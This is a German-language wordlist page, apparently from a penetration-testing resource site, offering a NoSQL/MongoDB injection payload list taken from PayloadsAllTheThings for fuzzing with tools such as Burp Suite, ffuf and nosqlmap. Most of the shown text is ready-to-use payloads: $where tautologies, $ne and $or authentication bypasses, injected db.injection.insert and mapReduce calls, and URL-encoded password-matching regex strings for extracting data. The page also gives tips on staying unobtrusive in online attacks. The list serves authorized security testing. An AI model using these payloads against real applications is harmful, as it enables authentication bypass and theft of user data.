NoSQL injection payloads
MongoDB-/NoSQL-Injection-Payloads, die die Operatoren $where, $ne und $or verwenden, um die Authentifizierung zu umgehen und Daten zu extrahieren.
- Größe
- 696 B
- Kategorie
- Fuzzing
- Quelle
- swisskyrepo/PayloadsAllTheThings
- Lizenz
- MIT
- Empfohlene Tools
- burpsuiteffufnosqlmap
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (696 B) herunter oder kopiere sie über die Schaltflächen oben.
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00MongoDB-/NoSQL-Injection-Payloads, die die Operatoren $where, $ne und $or verwenden, um die Authentifizierung zu umgehen und Daten zu extrahieren.
Diese Liste ist auf das Eingabe-Fuzzing und die Schwachstellenerkennung ausgerichtet. Sie umfasst etwa 696 B und passt gut zu Werkzeugen wie burpsuite, ffuf, nosqlmap. Wähle die kleinste Liste, die zu deinem Einsatz passt: kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeiten bieten, bei denen Geschwindigkeit weniger ins Gewicht fällt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
die Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
aus ihrer Upstream-Quelle auf GitHub bereitgestellt.
Bezogen von swisskyrepo/PayloadsAllTheThings und vertrieben unter MIT. Verwende Wortlisten nur gegen Systeme, zu deren Test du ausdrücklich autorisiert bist.